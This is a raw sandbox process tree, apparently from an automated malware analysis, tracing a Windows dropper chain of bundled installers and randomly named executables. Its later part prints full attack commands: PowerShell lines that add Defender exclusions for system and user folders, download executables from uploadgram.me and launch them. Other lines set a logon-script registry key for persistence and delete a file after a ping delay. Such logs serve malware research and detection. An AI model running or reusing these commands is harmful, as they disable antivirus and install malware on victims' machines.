                                                          "C:\Users\Admin\AppData\Local\Temp\is-RBGVP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                          7⤵
                                                            PID:4988
                                                            • C:\Users\Admin\AppData\Local\Temp\is-PA1V5.tmp\Setup.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-PA1V5.tmp\Setup.tmp" /SL5="$4037E,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-RBGVP.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                              8⤵
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:1864
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-06QOU.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                9⤵
                                                                  PID:5572
                                                                  • C:\Windows\SysWOW64\expand.exe
                                                                    expand C:\Users\Admin\AppData\Local\Temp\is-06QOU.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                    10⤵
                                                                    • Drops file in Windows directory
                                                                    PID:6724
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                  9⤵
                                                                  • Blocklisted process makes network request
                                                                  • Checks whether UAC is enabled
                                                                  • Drops file in Program Files directory
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2812
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                    10⤵
                                                                      PID:3772
                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                    9⤵
                                                                    • Loads dropped DLL
                                                                    PID:8744
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                    9⤵
                                                                      PID:6140
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-06QOU.tmp\{app}\vdi_compiler.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-06QOU.tmp\{app}\vdi_compiler"
                                                                      9⤵
                                                                        PID:4216
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-06QOU.tmp\{app}\vdi_compiler.exe"
                                                                          10⤵
                                                                            PID:5356
                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                              ping localhost -n 4
                                                                              11⤵
                                                                              • Runs ping.exe
                                                                              PID:8984
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:5264
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-F7LCA.tmp\WEATHER Manager.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-F7LCA.tmp\WEATHER Manager.tmp" /SL5="$1031C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:5560
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-K4D5U.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-K4D5U.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      • Enumerates connected drives
                                                                      • Modifies system certificate store
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:7056
                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-K4D5U.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-K4D5U.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289476 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                        8⤵
                                                                          PID:8408
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                    5⤵
                                                                      PID:1324
                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289476 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                        6⤵
                                                                          PID:9060
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                        5⤵
                                                                          PID:5296
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-PATMS.tmp\VPN.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-PATMS.tmp\VPN.tmp" /SL5="$10320,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:5644
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-056P3.tmp\Setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-056P3.tmp\Setup.exe" /silent /subid=720
                                                                              7⤵
                                                                                PID:8024
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-S3FED.tmp\Setup.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-S3FED.tmp\Setup.tmp" /SL5="$2042E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-056P3.tmp\Setup.exe" /silent /subid=720
                                                                                  8⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in Program Files directory
                                                                                  • Modifies registry class
                                                                                  • Modifies system certificate store
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:1568
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                    9⤵
                                                                                      PID:7852
                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                        tapinstall.exe remove tap0901
                                                                                        10⤵
                                                                                        • Checks SCSI registry key(s)
                                                                                        PID:7572
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                      9⤵
                                                                                        PID:7000
                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                                          10⤵
                                                                                          • Drops file in System32 directory
                                                                                          • Drops file in Windows directory
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1876
                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                        9⤵
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        PID:1792
                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                        9⤵
                                                                                          PID:3116
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  • Drops file in Program Files directory
                                                                                  PID:5316
                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5420
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-24NPA.tmp\MediaBurner2.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-24NPA.tmp\MediaBurner2.tmp" /SL5="$2032E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                    6⤵
                                                                                      PID:6088
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SCCOB.tmp\3377047_logo_media.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SCCOB.tmp\3377047_logo_media.exe" /S /UID=burnerch2
                                                                                        7⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Drops file in Program Files directory
                                                                                        PID:4324
                                                                                        • C:\Program Files\Uninstall Information\EQMXWQBCCX\ultramediaburner.exe
                                                                                          "C:\Program Files\Uninstall Information\EQMXWQBCCX\ultramediaburner.exe" /VERYSILENT
                                                                                          8⤵
                                                                                            PID:7828
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-ODTLB.tmp\ultramediaburner.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-ODTLB.tmp\ultramediaburner.tmp" /SL5="$2043C,281924,62464,C:\Program Files\Uninstall Information\EQMXWQBCCX\ultramediaburner.exe" /VERYSILENT
                                                                                              9⤵
                                                                                              • Drops file in Program Files directory
                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                              PID:8120
                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                10⤵
                                                                                                  PID:5124
                                                                                            • C:\Users\Admin\AppData\Local\Temp\f9-0466a-d49-f6181-aa08d69dc6856\Kaejykypubu.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\f9-0466a-d49-f6181-aa08d69dc6856\Kaejykypubu.exe"
                                                                                              8⤵
                                                                                              • Checks computer location settings
                                                                                              PID:7536
                                                                                            • C:\Users\Admin\AppData\Local\Temp\ea-0c2a4-d46-03bab-b1519889bb6e4\Lebafolavu.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\ea-0c2a4-d46-03bab-b1519889bb6e4\Lebafolavu.exe"
                                                                                              8⤵
                                                                                                PID:7080
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uikqoppy.0z4\GcleanerEU.exe /eufive & exit
                                                                                                  9⤵
                                                                                                    PID:5048
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      10⤵
                                                                                                        PID:6756
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\uikqoppy.0z4\GcleanerEU.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\uikqoppy.0z4\GcleanerEU.exe /eufive
                                                                                                        10⤵
                                                                                                          PID:8612
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\32m2ys5u.0id\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                        9⤵
                                                                                                          PID:8544
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\32m2ys5u.0id\installer.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\32m2ys5u.0id\installer.exe /qn CAMPAIGN="654"
                                                                                                            10⤵
                                                                                                              PID:9000
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v343eyav.3rn\ufgaa.exe & exit
                                                                                                            9⤵
                                                                                                              PID:8900
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\orimxpj3.yyo\anyname.exe & exit
                                                                                                              9⤵
                                                                                                                PID:3740
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\orimxpj3.yyo\anyname.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\orimxpj3.yyo\anyname.exe
                                                                                                                  10⤵
                                                                                                                    PID:8752
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\orimxpj3.yyo\anyname.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\orimxpj3.yyo\anyname.exe" -q
                                                                                                                      11⤵
                                                                                                                        PID:8392
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n24uflba.d1r\gcleaner.exe /mixfive & exit
                                                                                                                    9⤵
                                                                                                                      PID:8928
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\n24uflba.d1r\gcleaner.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\n24uflba.d1r\gcleaner.exe /mixfive
                                                                                                                        10⤵
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:8304
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3604
                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4408
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  7⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:5768
                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks computer location settings
                                                                                                              PID:5896
                                                                                                              • C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe
                                                                                                                "C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"
                                                                                                                6⤵
                                                                                                                  PID:6912
                                                                                                                  • C:\Users\Admin\AppData\Roaming\4633387.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\4633387.exe"
                                                                                                                    7⤵
                                                                                                                      PID:7556
                                                                                                                    • C:\Users\Admin\AppData\Roaming\2174399.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\2174399.exe"
                                                                                                                      7⤵
                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                      PID:5484
                                                                                                                    • C:\Users\Admin\AppData\Roaming\6772511.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\6772511.exe"
                                                                                                                      7⤵
                                                                                                                        PID:3956
                                                                                                                    • C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe
                                                                                                                      "C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"
                                                                                                                      6⤵
                                                                                                                        PID:6904
                                                                                                                      • C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe
                                                                                                                        "C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"
                                                                                                                        6⤵
                                                                                                                          PID:6896
                                                                                                                        • C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe
                                                                                                                          "C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"
                                                                                                                          6⤵
                                                                                                                            PID:7024
                                                                                                                            • C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe
                                                                                                                              "C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe" -q
                                                                                                                              7⤵
                                                                                                                                PID:8036
                                                                                                                            • C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe
                                                                                                                              "C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"
                                                                                                                              6⤵
                                                                                                                                PID:6612
                                                                                                                              • C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe
                                                                                                                                "C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"
                                                                                                                                6⤵
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:6664
                                                                                                                              • C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                "C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"
                                                                                                                                6⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:6656
                                                                                                                                • C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                  C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                  7⤵
                                                                                                                                    PID:7740
                                                                                                                                • C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe
                                                                                                                                  "C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:6648
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 696
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:7792
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6648 -s 888
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:4496
                                                                                                                                  • C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
                                                                                                                                    "C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:6632
                                                                                                                                    • C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
                                                                                                                                      C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
                                                                                                                                      7⤵
                                                                                                                                        PID:7696
                                                                                                                                    • C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe
                                                                                                                                      "C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:6596
                                                                                                                                      • C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe
                                                                                                                                        "C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                        PID:6584
                                                                                                                                      • C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe
                                                                                                                                        "C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:6568
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 660
                                                                                                                                            7⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:7520
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 892
                                                                                                                                            7⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:6920
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1120
                                                                                                                                            7⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:7824
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 1132
                                                                                                                                            7⤵
                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                            • Program crash
                                                                                                                                            PID:7532
                                                                                                                                        • C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
                                                                                                                                          "C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:6560
                                                                                                                                          • C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
                                                                                                                                            C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
                                                                                                                                            7⤵
                                                                                                                                              PID:7764
                                                                                                                                          • C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe
                                                                                                                                            "C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:6544
                                                                                                                                              • C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe
                                                                                                                                                "C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:7904
                                                                                                                                            • C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe
                                                                                                                                              "C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                              PID:5792
                                                                                                                                            • C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe
                                                                                                                                              "C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:6512
                                                                                                                                              • C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe
                                                                                                                                                "C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:4968
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                    7⤵
                                                                                                                                                      PID:6172
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                        8⤵
                                                                                                                                                          PID:6044
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                          8⤵
                                                                                                                                                            PID:7388
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                            8⤵
                                                                                                                                                              PID:6188
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                              8⤵
                                                                                                                                                                PID:9712
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                8⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                PID:9764
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:9100
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:9008
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:9892
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:6960
                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:9900
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                11⤵
                                                                                                                                                                                  PID:6644
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                  11⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:9120
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:9516
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                    11⤵
                                                                                                                                                                                      PID:9620
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:10200
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                        PID:6152
